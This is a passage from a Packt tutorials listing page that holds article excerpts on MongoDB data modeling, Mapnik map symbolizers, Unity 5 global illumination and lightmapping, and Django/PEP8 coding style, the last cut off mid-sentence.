How-To Tutorials

23 Jun 2015

11 min read

SQL Injection

23 Jun 2015

0
0
8207

How-To Tutorials

article-image-moving-further-numpy-modules

Packt

23 Jun 2015

23 min read

Moving Further with NumPy Modules

Packt

23 Jun 2015

23 min read

0
0
4499

article-image-documents-and-collections-data-modeling-mongodb

Packt

22 Jun 2015

12 min read

Documents and Collections in Data Modeling with MongoDB

Packt

22 Jun 2015

12 min read

In this article by Wilson da Rocha França, author of the book, MongoDB Data Modeling, we will cover documents and collections used in data modeling with MongoDB. (For more resources related to this topic, see here.) Data modeling is a very important process during the conception of an application since this step will help you to define the necessary requirements for the database's construction. This definition is precisely the result of the data understanding acquired during the data modeling process. As previously described, this process, regardless of the chosen data model, is commonly divided into two phases: one that is very close to the user's view and the other that is a translation of this view to a conceptual schema. In the scenario of relational database modeling, the main challenge is to build a robust database from these two phases, with the aim of guaranteeing updates to it with any impact during the application's lifecycle. A big advantage of NoSQL compared to relational databases is that NoSQL databases are more flexible at this point, due to the possibility of a schema-less model that, in theory, can cause less impact on the user's view if a modification in the data model is needed. Despite the flexibility NoSQL offers, it is important to previously know how we will use the data in order to model a NoSQL database. It is a good idea not to plan the data format to be persisted, even in a NoSQL database. Moreover, at first sight, this is the point where database administrators, quite used to the relational world, become more uncomfortable. Relational database standards, such as SQL, brought us a sense of security and stability by setting up rules, norms, and criteria. On the other hand, we will dare to state that this security turned database designers distant of the domain from which the data to be stored is drawn. The same thing happened with application developers. There is a notable divergence of interests among them and database administrators, especially regarding data models. The NoSQL databases practically bring the need for an approximation between database professionals and the applications, and also the need for an approximation between developers and databases. For that reason, even though you may be a data modeler/designer or a database administrator, don't be scared if from now on we address subjects that are out of your comfort zone. Be prepared to start using words common from the application developer's point of view, and add them to your vocabulary. This article will cover the following: Introducing your documents and collections The document's characteristics and structure Introducing documents and collections MongoDB has the document as a basic unity of data. The documents in MongoDB are represented in JavaScript Object Notation (JSON). Collections are groups of documents. Making an analogy, a collection is similar to a table in a relational model and a document is a record in this table. And finally, collections belong to a database in MongoDB. The documents are serialized on disk in a format known as Binary JSON (BSON), a binary representation of a JSON document. An example of a document is: { "_id": 123456, "firstName": "John", "lastName": "Clay", "age": 25, "address": { "streetAddress": "131 GEN. Almério de Moura Street", "city": "Rio de Janeiro", "state": "RJ", "postalCode": "20921060" }, "phoneNumber":[ { "type": "home", "number": "+5521 2222-3333" }, { "type": "mobile", "number": "+5521 9888-7777" } ] } Unlike the relational model, where you must declare a table structure, a collection doesn't enforce a certain structure for a document. It is possible that a collection contains documents with completely different structures. We can have, for instance, on the same users collection: { "_id": "123456", "username": "johnclay", "age": 25, "friends":[ {"username": "joelsant"}, {"username": "adilsonbat"} ], "active": true, "gender": "male" } We can also have: { "_id": "654321", "username": "santymonty", "age": 25, "active": true, "gender": "male", "eyeColor": "brown" } In addition to this, another interesting feature of MongoDB is that not just data is represented by documents. Basically, all user interactions with MongoDB are made through documents. Besides data recording, documents are a means to: Define what data can be read, written, and/or updated in queries Define which fields will be updated Create indexes Configure replication Query the information from the database Before we go deep into the technical details of documents, let's explore their structure. JSON JSON is a text format for the open-standard representation of data and that is ideal for data traffic. To explore the JSON format deeper, you can check ECMA-404 The JSON Data Interchange Standard where the JSON format is fully described. JSON is described by two standards: ECMA-404 and RFC 7159. The first one puts more focus on the JSON grammar and syntax, while the second provides semantic and security considerations. As the name suggests, JSON arises from the JavaScript language. It came about as a solution for object state transfers between the web server and the browser. Despite being part of JavaScript, it is possible to find generators and readers for JSON in almost all the most popular programming languages such as C, Java, and Python. The JSON format is also considered highly friendly and human-readable. JSON does not depend on the platform chosen, and its specification are based on two data structures: A set or group of key/value pairs A value ordered list So, in order to clarify any doubts, let's talk about objects. Objects are a non-ordered collection of key/value pairs that are represented by the following pattern: { "key" : "value" } In relation to the value ordered list, a collection is represented as follows: ["value1", "value2", "value3"] In the JSON specification, a value can be: A string delimited with " " A number, with or without a sign, on a decimal base (base 10). This number can have a fractional part, delimited by a period (.), or an exponential part followed by e or E Boolean values (true or false) A null value Another object Another value ordered array The following diagram shows us the JSON value structure: Here is an example of JSON code that describes a person: { "name" : "Han", "lastname" : "Solo", "position" : "Captain of the Millenium Falcon", "species" : "human", "gender":"male", "height" : 1.8 } BSON BSON means Binary JSON, which, in other words, means binary-encoded serialization for JSON documents. If you are seeking more knowledge on BSON, I suggest you take a look at the BSON specification on http://bsonspec.org/. If we compare BSON to the other binary formats, BSON has the advantage of being a model that allows you more flexibility. Also, one of its characteristics is that it's lightweight—a feature that is very important for data transport on the Web. The BSON format was designed to be easily navigable and both encoded and decoded in a very efficient way for most of the programming languages that are based on C. This is the reason why BSON was chosen as the data format for MongoDB disk persistence. The types of data representation in BSON are: String UTF-8 (string) Integer 32-bit (int32) Integer 64-bit (int64) Floating point (double) Document (document) Array (document) Binary data (binary) Boolean false (x00 or byte 0000 0000) Boolean true (x01 or byte 0000 0001) UTC datetime (int64)—the int64 is UTC milliseconds since the Unix epoch Timestamp (int64)—this is the special internal type used by MongoDB replication and sharding; the first 4 bytes are an increment, and the last 4 are a timestamp Null value () Regular expression (cstring) JavaScript code (string) JavaScript code w/scope (code_w_s) Min key()—the special type that compares a lower value than all other possible BSON element values Max key()—the special type that compares a higher value than all other possible BSON element values ObjectId (byte*12) Characteristics of documents Before we go into detail about how we must model documents, we need a better understanding of some of its characteristics. These characteristics can determine your decision about how the document must be modeled. The document size We must keep in mind that the maximum length for a BSON document is 16 MB. According to BSON specifications, this length is ideal for data transfers through the Web and to avoid the excessive use of RAM. But this is only a recommendation. Nowadays, a document can exceed the 16 MB length by using GridFS. GridFS allows us to store documents in MongoDB that are larger than the BSON maximum size, by dividing it into parts, or chunks. Each chunk is a new document with 255 K of size. Names and values for a field in a document There are a few things that you must know about names and values for fields in a document. First of all, any field's name in a document is a string. As usual, we have some restrictions on field names. They are: The _id field is reserved for a primary key You cannot start the name using the character $ The name cannot have a null character, or (.) Additionally, documents that have indexed fields must respect the size limit for an indexed field. The values cannot exceed the maximum size of 1,024 bytes. The document primary key As seen in the preceding section, the _id field is reserved for the primary key. By default, this field must be the first one in the document, even when, during an insertion, it is not the first field to be inserted. In these cases, MongoDB moves it to the first position. Also, by definition, it is in this field that a unique index will be created. The _id field can have any value that is a BSON type, except the array. Moreover, if a document is created without an indication of the _id field, MongoDB will automatically create an _id field of the ObjectId type. However, this is not the only option. You can use any value you want to identify your document as long as it is unique. There is another option, that is, generating an auto-incremental value based on a support collection or on an optimistic loop. Support collections In this method, we use a separate collection that will keep the last used value in the sequence. To increment the sequence, first we should query the last used value. After this, we can use the operator $inc to increment the value. There is a collection called system.js that can keep the JavaScript code in order to reuse it. Be careful not to include application logic in this collection. Let's see an example for this method: db.counters.insert( { _id: "userid", seq: 0 } ) function getNextSequence(name) { var ret = db.counters.findAndModify( { query: { _id: name }, update: { $inc: { seq: 1 } }, new: true } ); return ret.seq; } db.users.insert( { _id: getNextSequence("userid"), name: "Sarah C." } ) The optimistic loop The generation of the _id field by an optimistic loop is done by incrementing each iteration and, after that, attempting to insert it in a new document: function insertDocument(doc, targetCollection) { while (1) { var cursor = targetCollection.find( {}, { _id: 1 } ).sort( { _id: -1 } ).limit(1); var seq = cursor.hasNext() ? cursor.next()._id + 1 : 1; doc._id = seq; var results = targetCollection.insert(doc); if( results.hasWriteError() ) { if( results.writeError.code == 11000 /* dup key */ ) continue; else print( "unexpected error inserting data: " + tojson( results ) ); } break; } } In this function, the iteration does the following: Searches in targetCollection for the maximum value for _id. Settles the next value for _id. Sets the value on the document to be inserted. Inserts the document. In the case of errors due to duplicated _id fields, the loop repeats itself, or else the iteration ends. The points demonstrated here are the basics to understanding all the possibilities and approaches that this tool can offer. But, although we can use auto-incrementing fields for MongoDB, we must avoid using them because this tool does not scale for a huge data mass. Summary In this article, you saw how to build documents in MongoDB, examined their characteristics, and saw how they are organized into collections. Resources for Article: Further resources on this subject: Apache Solr and Big Data – integration with MongoDB [article] About MongoDB [article] Creating a RESTful API [article]

0
0
2397

Packt

22 Jun 2015

25 min read

The pandas Data Structures

Packt

22 Jun 2015

25 min read

0
0
4873

Packt

18 Jun 2015

8 min read

Symbolizers

Packt

18 Jun 2015

8 min read

In this article by Erik Westra, author of the book, Python Geospatial Analysis Essentials, we will see that symbolizers do the actual work of drawing a feature onto the map. Multiple symbolizers are often used to draw a single feature. There are many different types of symbolizers available within Mapnik, and many of the symbolizers have complex options associated with them. Rather than exhaustively listing all the symbolizers and their various options, we will instead just look at some of the more common types of symbolizers and how they can be used. (For more resources related to this topic, see here.) PointSymbolizer The PointSymbolizer class is used to draw an image centered over a Point geometry. By default, each point is displayed as a 4 x 4 pixel black square: To use a different image, you have to create a mapnik.PathExpression object to represent the path to the desired image file, and then pass that to the PointSymbolizer object when you instantiate it: path = mapnik.PathExpression("/path/to/image.png") point_symbol = PointSymbolizer(path) Note that PointSymbolizer draws the image centered on the desired point. To use a drop-pin image as shown in the preceding example, you will need to add extra transparent whitespace so that the tip of the pin is in the middle of the image, like this: You can control the opacity of the drawn image by setting the symbolizer's opacity attribute. You can also control whether labels will be drawn on top of the image by setting the allow_overlap attribute to True. Finally, you can apply an SVG transformation to the image by setting the transform attribute to a string containing a standard SVG transformation expression, for example point_symbol.transform = "rotate(45)". Documentation for the PointSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/PointSymbolizer. LineSymbolizer A mapnik.LineSymbolizer is used to draw LineString geometries and the outlines of Polygon geometries. When you create a new LineSymbolizer, you would typically configure it using two parameters: the color to use to draw the line as a mapnik.Color object, and the width of the line, measured in pixels. For example: line_symbol = mapnik.LineSymbolizer(mapnik.Color("black"), 0.5) Notice that you can use fractional line widths; because Mapnik uses anti-aliasing, a line narrower than 1 pixel will often look better than a line with an integer width if you are drawing many lines close together. In addition to the color and the width, you can also make the line semi-transparent by setting the opacity attribute. This should be set to a number between 0.0 and 1.0, where 0.0 means the line will be completely transparent and 1.0 means the line will be completely opaque. You can also use the stroke attribute to get access to (or replace) the stroke object used by the line symbolizer. The stroke object, an instance of mapnik.Stroke, can be used for more complicated visual effects. For example, you can create a dashed line effect by calling the stroke's add_dash() method: line_symbol.stroke.add_dash(5, 7) Both numbers are measured in pixels; the first number is the length of the dash segment, while the second is the length of the gap between dashes. Note that you can create alternating dash patterns by calling add_dash() more than once. You can also set the stroke's line_cap attribute to control how the ends of the line should be drawn, and the stroke's line_join attribute to control how the joins between the individual line segments are drawn whenever the LineString changes direction. The line_cap attribute can be set to one of the following values: mapnik.line_cap.BUTT_CAP mapnik.line_cap.ROUND_CAP mapnik.line_cap.SQUARE_CAP The line_join attribute can be set to one of the following: mapnik.line_join.MITER_JOIN mapnik.line_join.ROUND_JOIN mapnik.line_join.BEVEL_JOIN Documentation for the LineSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/LineSymbolizer. PolygonSymbolizer The mapnik.PolygonSymbolizer class is used to fill the interior of a Polygon geometry with a given color. When you create a new PolygonSymbolizer, you would typically pass it a single parameter: the mapnik.Color object to use to fill the polygon. You can also change the opacity of the symbolizer by setting the fill_opacity attribute, for example: fill_symbol.fill_opacity = 0.8 Once again, the opacity is measured from 0.0 (completely transparent) to 1.0 (completely opaque). There is one other PolygonSymbolizer attribute which you might find useful: gamma. The gamma value can be set to a number between 0.0 and 1.0. The gamma value controls the amount of anti-aliasing used to draw the edge of the polygon; with the default gamma value of 1.0, the edges of the polygon will be fully anti-aliased. While this is usually a good thing, if you try to draw adjacent polygons with the same color, the antialiasing will cause the edges of the polygons to be visible rather than combining them into a single larger area. By turning down the gamma slightly (for example, fill_symbol.gamma = 0.6), the edges between adjacent polygons will disappear. Documentation for the PolygonSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/PolygonSymbolizer. TextSymbolizer The TextSymbolizer class is used to draw textual labels onto a map. This type of symbolizer can be used for point, LineString, and Polygon geometries. The following example shows how a TextSymbolizer can be used: text_symbol = mapnik.TextSymbolizer(mapnik.Expresion("[label]"), "DejaVu Sans Book", 10, mapnik.Color("black")) As you can see, four parameters are typically passed to the TextSymbolizer's initializer: A mapnik.Expression object defining the text to be displayed. In this case, the text to be displayed will come from the label attribute in the datasource. The name of the font to use for drawing the text. To see what fonts are available, type the following into the Python command line: import mapnik for font in mapnik.FontEngine.face_names(): print font The font size, measured in pixels. The color to use to draw the text. By default, the text will be drawn in the center of the geometry; for example: This positioning of the label is called point placement. The TextSymbolizer allows you to change this to use what is called line placement, where the label will be drawn along the lines: text_symbol.label_placement = mapnik.label_placement.LINE_PLACEMENT As you can see, this causes the label to be drawn along the length of a LineString geometry, or along the perimeter of a Polygon. The text won't be drawn at all for a Point geometry, since there are no lines within a point. The TextSymbolizer will normally just draw the label once, but you can tell the symbolizer to repeat the label if you wish by specifying a pixel gap to use between each label: text_symbol.label_spacing = 30 By default, Mapnik is smart enough to stop labels from overlapping each other. If possible, it moves the label slightly to avoid an overlap, and then hides the label completely if it would still overlap. For example: You can change this by setting the allow_overlap attribute: text_symbol.allow_overlap = True Finally, you can set a halo effect to draw a lighter-colored border around the text so that it is visible even against a dark background. For example, text_symbol.halo_fill = mapnik.Color("white") text_symbol.halo_radius = 1 There are many more labeling options, all of which are described at length in the documentation for the TextSymbolizer class. This can be found at https://github.com/mapnik/mapnik/wiki/TextSymbolizer. RasterSymbolizer The RasterSymbolizer class is used to draw raster-format data onto a map. This type of symbolizer is typically used in conjunction with a Raster or GDAL datasource. To create a new raster symbolizer, you instantiate a new mapnik.RasterSymbolizer object: raster_symbol = mapnik.RasterSymbolizer() The raster symbolizer will automatically draw any raster-format data provided by the map layer's datasource. This is often used to draw a basemap onto which the vector data is to be displayed; for example: While there are some advanced options to control the way the raster data is displayed, in most cases, the only option you might be interested in is the opacity attribute. As usual, this sets the opacity for the displayed image, allowing you to layer semi-transparent raster images one on top of the other. Documentation for the RasterSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/RasterSymbolizer. Summary In this article, we covered different types of symbolizers, which are available in the Mapnik library. We also examined that symbolizers which can be used to display spatial features, how the visible extent is used to control the portion of the map to be displayed, and how to render a map as an image file. Resources for Article: Further resources on this subject: Python functions – Avoid repeating code [article] Preparing to Build Your Own GIS Application [article] Server Logs [article]

0
0
3517

Packt

17 Jun 2015

16 min read

Global Illumination

Packt

17 Jun 2015

16 min read

In this article by Volodymyr Gerasimov, the author of the book, Building Levels in Unity, you will see two types of lighting that you need to take into account if you want to create well lit levels—direct and indirect. Direct light is the one that is coming directly from the source. Indirect light is created by light bouncing off the affected area at a certain angle with variable intensity. In the real world, the number of bounces is infinite and that is the reason why we can see dark areas that don't have light shining directly at them. In computer software, we don't yet have the infinite computing power at our disposal to be able to use different tricks to simulate the realistic lighting at runtime. The process that simulates indirect lighting, light bouncing, reflections, and color bleeding is known as Global Illumination (GI). Unity 5 is powered by one of the industry's leading technologies for handling indirect lighting (radiosity) in the gaming industry, called Enlighten by Geomerics. Games such as Battlefield 3-4, Medal of Honor: Warfighter, Need for Speed the Run and Dragon Age: Inquisition are excellent examples of what this technology is capable of, and now all of that power is at your fingertips completely for free! Now, it's only appropriate to learn how to tame this new beast. (For more resources related to this topic, see here.) Preparing the environment Realtime realistic lighting is just not feasible at our level of computing power, which forces us into inventing tricks to simulate it as close as possible, but just like with any trick, there are certain conditions that need to be met in order for it to work properly and keep viewer's eyes from exposing our clever deception. To demonstrate how to work with these limitations, we are going to construct a simple light set up for the small interior scene and talk about solutions to the problems as we go. For example, we will use the LightmappingInterior scene that can be found in the Chapter 7 folder in the Project window. It's a very simple interior and should take us no time to set up. The first step is to place the lights. We will be required to create two lights: a Directional to imitate the moonlight coming from the crack in the dome and a Point light for the fire burning in the goblet, on the ceiling. Tune the light's Intensity, Range (in Point light's case), and Color to your liking. So far so good! We can see the direct lighting coming from the moonlight, but there is no trace of indirect lighting. Why is this happening? Should GI be enabled somehow for it to work? As a matter of fact, it does and here comes the first limitation of Global Illumination—it only works on GameObjects that are marked as Static. Static versus dynamic objects Unity objects can be of one of the two categories: static or dynamic. Differentiation is very simple: static objects don't move, they stay still where they are at all times, they neither play any animations nor engage in any kind of interactions. The rest of the objects are dynamic. By default, all objects in Unity are dynamic and can only be converted into static by checking the Static checkbox in the Inspector window. See it for yourself. Try to mark an object as static in Unity and attempt to move it around in the Play mode. Does it work? Global Illumination will only work with static objects; this means, before we go into the Play mode right above it, we need to be 100 percent sure that the objects that will cast and receive indirect lights will not stop doing that from their designated positions. However, why is that you may ask, isn't the whole purpose of Realtime GI to calculate indirect lighting in runtime? The answer to that would be yes, but only to an extent. The technology behind this is called Precomputed Realtime GI, according to Unity developers it precomputes all possible bounces that the light can make and encodes them to be used in realtime; so it essentially tells us that it's going to take a static object, a light and answer a question: "If this light is going to travel around, how is it going to bounce from the affected surface of the static object from every possible angle?" During runtime, lights are using this encoded data as instructions on how the light should bounce instead of calculating it every frame. Having static objects can be beneficial in many other ways, such as pathfinding, but that's a story for another time. To test this theory, let's mark objects in the scene as Static, meaning they will not move (and can't be forced to move) by physics, code or even transformation tools (the latter is only true during the Play mode). To do that, simply select Pillar, Dome, WaterProNighttime, and Goblet GameObjects in the Hierarchy window and check the Static checkbox at the top-right corner of the Inspector window. Doing that will cause Unity to recalculate the light and encode bouncing information. Once the process has finished (it should take no time at all), you can hit the Play button and move the light around. Notice that bounce lighting is changing as well without any performance overhead. Fixing the light coming from the crack The moonlight inside the dome should be coming from the crack on its surface, however, if you rotate the directional light around, you'll notice that it simply ignores concrete walls and freely shines through. Naturally, that is incorrect behavior and we can't have that stay. We can clearly see through the dome ourselves from the outside as a result of one-sided normals. Earlier, the solution was to duplicate the faces and invert the normals; however, in this case, we actually don't mind seeing through the walls and only want to fix the lighting issue. To fix this, we need to go to the Mesh Render component of the Dome GameObject and select the Two Sided option from the drop-down menu of the Cast Shadows parameter. This will ignore backface culling and allow us to cast shadows from both sides of the mesh, thus fixing the problem. In order to cast shadows, make sure that your directional light has Shadow Type parameter set to either Hard Shadows or Soft Shadows. Emission materials Another way to light up the level is to utilize materials with Emission maps. Pillar_EmissionMaterial applied to the Pillar GameObject already has an Emission map assigned to it, all that is left is to crank up the parameter next to it, to a number which will give it a noticeable effect (let's say 3). Unfortunately, emissive materials are not lights, and precomputed GI will not be able to update indirect light bounce created by the emissive material. As a result, changing material in the Play mode will not cause the update. Changes done to materials in the Play mode will be preserved in the Editor. Shadows An important byproduct of lighting is shadows cast by affected objects. No surprises here! Unity allows us to cast shadows by both dynamic and static objects and have different results based on render settings. By default, all lights in Unity have shadows disabled. In order to enable shadows for a particular light, we need to modify the Shadow Type parameter to be either Hard Shadows or Soft Shadows in the Inspector window. Enabling shadows will grant you access to three parameters: Strength: This is the darkness of shadows, from 0 to 1. Resolution: This controls the resolution of the shadows. This parameter can utilize the value set in the Use Quality Settings or be selected individually from the drop down menu. Bias and Normal Bias – this is the shadow offset. These parameters are used to prevent an artifact known as Shadow Acne (pixelated shadows in lit areas); however, setting them too high can cause another artifact known as Peter Panning (disconnected shadow). Default values usually help us to avoid both issues. Unity is using a technique known as Shadow Mapping, which determines the objects that will be lit by assuming the light's perspective—every object that light sees directly, is lit; every object that isn't seen should be in the shadow. After rendering the light's perspective, Unity stores the depth of each surface into a shadow map. In the cases where the shadow map resolution is low, this can cause some pixels to appear shaded when they shouldn't be (Shadow Acne) or not have a shadow where it's supposed to be (Peter Panning), if the offset is too high. Unity allows you to control the objects that should receive or cast shadows by changing the parameters Cast Shadows and Receive Shadows in the Rendering Mesh component of a GameObject. Lightmapping Every year, more and more games are being released with real-time rendering solutions that allow for more realistic-looking environments at the price of ever-growing computing power of modern PCs and consoles. However, due to the limiting hardware capabilities of mobile platforms, it is still a long time before we are ready to part ways with cheap and affordable techniques such as lightmapping. Lightmapping is a technology for precomputing brightness of surfaces, also known as baking, and storing it in a separate texture—a lightmap. In order to see lighting in the area, we need to be able to calculate it at least 30 times per second (or more, based on fps requirements). This is not very cheap; however, with lightmapping we can calculate lighting once and then apply it as a texture. This technology is suitable for static objects that artists know will never be moved; in a nutshell, this process involves creating a scene, setting up the lighting rig and clicking Bake to get great lighting with minimum performance issues during runtime. To demonstrate the lightmapping process, we will take the scene and try to bake it using lightmapping. Static versus dynamic lights We've just talked about a way to guarantee that the GameObjects will not move. But what about lights? Hitting the Static checkbox for lights will not achieve much (unless you simply want to completely avoid the possibility of accidentally moving them). The problem at hand is that light, being a component of an object, has a separate set of controls allowing them to be manipulated even if the holder is set to static. For that purpose, each light has a parameter that allows us to specify the role of individual light and its contribution to the baking process, this parameter is called Baking. There are three options available for it: Realtime: This option will exclude this particular light from the baking process. It is totally fine to use real-time lighting, precomputed GI will make sure that modern computers and consoles are able to handle them quite smoothly. However, they might cause an issue if you are developing for the mobile platforms which will require every bit of optimization to be able to run with a stable frame rate. There are ways to fake real-time lighting with much cheaper options,. The only thing you should consider is that the number of realtime lights should be kept at a minimum if you are going for maximum optimization. Realtime will allow lights to affect static and dynamic objects. Baked: This option will include this light into the baking process. However, there is a catch: only static objects will receive light from it. This is self-explanatory—if we want dynamic objects to receive lighting, we need to calculate it every time the position of an object changes, which is what Realtime lighting does. Baked lights are cheap, calculated once we have stored all lighting information on a hard drive and using it from there, no further recalculation is required during runtime. It is mostly used on small situational lights that won't have a significant effect on dynamic objects. Mixed: This one is a combination of the previous two options. It bakes the lights into the static objects and affects the dynamic objects as they pass by. Think of the street lights: you want the passing cars to be affected; however, you have no need to calculate the lighting for the static environment in realtime. Naturally, we can't have dynamic objects move around the level unlit, no matter how much we'd like to save on computing power. Mixed will allow us to have the benefit of the baked lighting on the static objects as well as affect the dynamic objects at runtime. The first step that we are going to take is changing the Baking parameter of our lights from Realtime to Baked and enabling Soft Shadows: You shouldn't notice any significant difference, except for the extra shadows appearing. The final result isn't too different from the real-time lighting. Its performance is much better, but lacks the support of dynamic objects. Dynamic shadows versus static shadows One of the things that get people confused when starting to work with shadows in Unity is how they are being cast by static and dynamic objects with different Baking settings on the light source. This is one of those things that you simply need to memorize and keep in mind when planning the lighting in the scene. We are going to explore how different Baking options affect the shadow casting between different combinations of static and dynamic objects: As you can see, real-time lighting handles everything pretty well; all the objects are casting shadows onto each other and everything works as intended. There is even color bleeding happening between two static objects on the right. With Baked lighting the result isn't that inspiring. Let's break it down. Dynamic objects are not lit. If the object is subject to change at runtime, we can't preemptively bake it into the lightmap; therefore, lights that are set to Baked will simply ignore them. Shadows are only cast by static objects onto static objects. This correlates to the previous statement that if we aren't sure that the object is going to change we can't safely bake its shadows into the shadow map. With Mixed we get a similar result as with real-time lighting, except for one instance: dynamic objects are not casting shadows onto static objects, but the reverse does work: static objects are casting shadows onto the dynamic objects just fine, so what's the catch? Each object gets individual treatment from the Mixed light: those that are static are treated as if they are lit by the Baked light and dynamic are lit in realtime. In other words, when we are casting a shadow onto a dynamic object, it is calculated in realtime, while when we are casting shadow onto the static object, it is baked and we can't bake a shadow that is cast by the object that is subject to change. This was never the case with real-time lighting, since we were calculating the shadows at realtime, regardless of what they were cast by or cast onto. And again, this is just one scenario that you need to memorize. Lighting options The Lighting window has three tabs: Object, Scene, and Lightmap. For now we will focus on the first one. The main content of an Object tab is information on objects that are currently selected. This allows us to get quick access to a list of controls, to better tweak selected objects for lightmapping and GI. You can switch between object types with the help of Scene Filter at the top; this is a shortcut to filtering objects in the Hierarchy window (this will not filter the selected GameObjects, but everything in the Hierarchy window). All GameObjects need to be set to Static in order to be affected by the lightmapping process; this is why the Lightmap Static checkbox is the first in the list for Mesh Renderers. If you haven't set the object to static in the Inspector window, checking the Lightmap Static box will do just that. The Scale in Lightmap parameter controls the lightmap resolution. The greater the value, the bigger the resolution given to the object's lightmap, resulting in better lighting effects and shadows. Setting the parameter to 0 will result in an object not being affected by lightmapping. Unless you are trying to fix lighting artifacts on the object, or going for the maximum optimization, you shouldn't touch this parameter; there is a better way to adjust the lightmap resolution for all objects in the scene; Scale in Lightmap scales in relation to global value. The rest of the parameters are very situational and quite advanced, they deal with UVs, extend the effect of GI on the GameObject, and give detailed information on the lightmap. For lights, we have a baking parameter with three options: Realtime, Baked, or Mixed. Naturally, if you want this light for lightmapping, Realtime is not an option, so you should pick Baked or Mixed. Color and Intensity are referenced from the Inspector window and can be adjusted in either place. Baked Shadows allows us to choose the shadow type that will be baked (Hard, Soft, Off). Summary Lighting is a difficult process that is deceptively easy to learn, but hard to master. In Unity, lighting isn't without its issues. Attempting to apply real-world logic to 3D rendering will result in a direct confrontation with limitations posed by imperfect simulation. In order to solve issues that may arise, one must first understand what might be causing them, in order to isolate the problem and attempt to find a solution. Alas, there are still a lot of topics left uncovered that are outside of the realm of an introduction. If you wish to learn more about lighting, I would point you again to the official documentation and developer blogs, where you'll find a lot of useful information, tons of theory, practical recommendations, as well as in-depth look into all light elements discussed. Resources for Article: Further resources on this subject: Learning NGUI for Unity [article] Saying Hello to Unity and Android [article] Components in Unity [article]

0
0
24587

Packt

17 Jun 2015

16 min read

Code Style in Django

Packt

17 Jun 2015

16 min read

In this article written by Sanjeev Jaiswal and Ratan Kumar, authors of the book Learning Django Web Development, this article will cover all the basic topics which you would require to follow, such as coding practices for better Django web development, which IDE to use, version control, and so on. We will learn the following topics in this article: Django coding style Using IDE for Django web development Django project structure This article is based on the important fact that code is read much more often than it is written. Thus, before you actually start building your projects, we suggest that you familiarize yourself with all the standard practices adopted by the Django community for web development. Django coding style Most of Django's important practices are based on Python. Though chances are you already know them, we will still take a break and write all the documented practices so that you know these concepts even before you begin. To mainstream standard practices, Python enhancement proposals are made, and one such widely adopted standard practice for development is PEP8, the style guide for Python code–the best way to style the Python code authored by Guido van Rossum. The documentation says, "PEP8 deals with semantics and conventions associated with Python docstrings." For further reading, please visit http://legacy.python.org/dev/peps/pep-0008/. Understanding indentation in Python When you are writing Python code, indentation plays a very important role. It acts as a block like in other languages, such as C or Perl. But it's always a matter of discussion amongst programmers whether we should use tabs or spaces, and, if space, how many–two or four or eight. Using four spaces for indentation is better than eight, and if there are a few more nested blocks, using eight spaces for each indentation may take up more characters than can be shown in single line. But, again, this is the programmer's choice. The following is what incorrect indentation practices lead to: >>> def a(): ... print "foo" ... print "bar" IndentationError: unexpected indent So, which one we should use: tabs or spaces? Choose any one of them, but never mix up tabs and spaces in the same project or else it will be a nightmare for maintenance. The most popular way of indention in Python is with spaces; tabs come in second. If any code you have encountered has a mixture of tabs and spaces, you should convert it to using spaces exclusively. Doing indentation right – do we need four spaces per indentation level? There has been a lot of confusion about it, as of course, Python's syntax is all about indentation. Let's be honest: in most cases, it is. So, what is highly recommended is to use four spaces per indentation level, and if you have been following the two-space method, stop using it. There is nothing wrong with it, but when you deal with multiple third party libraries, you might end up having a spaghetti of different versions, which will ultimately become hard to debug. Now for indentation. When your code is in a continuation line, you should wrap it vertically aligned, or you can go in for a hanging indent. When you are using a hanging indent, the first line should not contain any argument and further indentation should be used to clearly distinguish it as a continuation line. A hanging indent (also known as a negative indent) is a style of indentation in which all lines are indented except for the first line of the paragraph. The preceding paragraph is the example of hanging indent. The following example illustrates how you should use a proper indentation method while writing the code: bar = some_function_name(var_first, var_second, var_third, var_fourth) # Here indentation of arguments makes them grouped, and stand clear from others. def some_function_name( var_first, var_second, var_third, var_fourth): print(var_first) # This example shows the hanging intent. We do not encourage the following coding style, and it will not work in Python anyway: # When vertical alignment is not used, Arguments on the first line are forbidden foo = some_function_name(var_first, var_second, var_third, var_fourth) # Further indentation is required as indentation is not distinguishable between arguments and source code. def some_function_name( var_first, var_second, var_third, var_fourth): print(var_first) Although extra indentation is not required, if you want to use extra indentation to ensure that the code will work, you can use the following coding style: # Extra indentation is not necessary. if (this and that): do_something() Ideally, you should limit each line to a maximum of 79 characters. It allows for a + or – character used for viewing difference using version control. It is even better to limit lines to 79 characters for uniformity across editors. You can use the rest of the space for other purposes. The importance of blank lines The importance of two blank lines and single blank lines are as follows: Two blank lines: A double blank lines can be used to separate top-level functions and the class definition, which enhances code readability. Single blank lines: A single blank line can be used in the use cases–for example, each function inside a class can be separated by a single line, and related functions can be grouped together with a single line. You can also separate the logical section of source code with a single line. Importing a package Importing a package is a direct implication of code reusability. Therefore, always place imports at the top of your source file, just after any module comments and document strings, and before the module's global and constants as variables. Each import should usually be on separate lines. The best way to import packages is as follows: import os import sys It is not advisable to import more than one package in the same line, for example: import sys, os You may import packages in the following fashion, although it is optional: from django.http import Http404, HttpResponse If your import gets longer, you can use the following method to declare them: from django.http import ( Http404, HttpResponse, HttpResponsePermanentRedirect ) Grouping imported packages Package imports can be grouped in the following ways: Standard library imports: Such as sys, os, subprocess, and so on. import reimport simplejson Related third party imports: These are usually downloaded from the Python cheese shop, that is, PyPy (using pip install). Here is an example: from decimal import * Local application / library-specific imports: This included the local modules of your projects, such as models, views, and so on. from models import ModelFoofrom models import ModelBar Naming conventions in Python/Django Every programming language and framework has its own naming convention. The naming convention in Python/Django is more or less the same, but it is worth mentioning it here. You will need to follow this while creating a variable name or global variable name and when naming a class, package, modules, and so on. This is the common naming convention that we should follow: Name the variables properly: Never use single characters, for example, 'x' or 'X' as variable names. It might be okay for your normal Python scripts, but when you are building a web application, you must name the variable properly as it determines the readability of the whole project. Naming of packages and modules: Lowercase and short names are recommended for modules. Underscores can be used if their use would improve readability. Python packages should also have short, all-lowercase names, although the use of underscores is discouraged. Since module names are mapped to file names (models.py, urls.py, and so on), it is important that module names be chosen to be fairly short as some file systems are case insensitive and truncate long names. Naming a class: Class names should follow the CamelCase naming convention, and classes for internal use can have a leading underscore in their name. Global variable names: First of all, you should avoid using global variables, but if you need to use them, prevention of global variables from getting exported can be done via __all__, or by defining them with a prefixed underscore (the old, conventional way). Function names and method argument: Names of functions should be in lowercase and separated by an underscore and self as the first argument to instantiate methods. For classes or 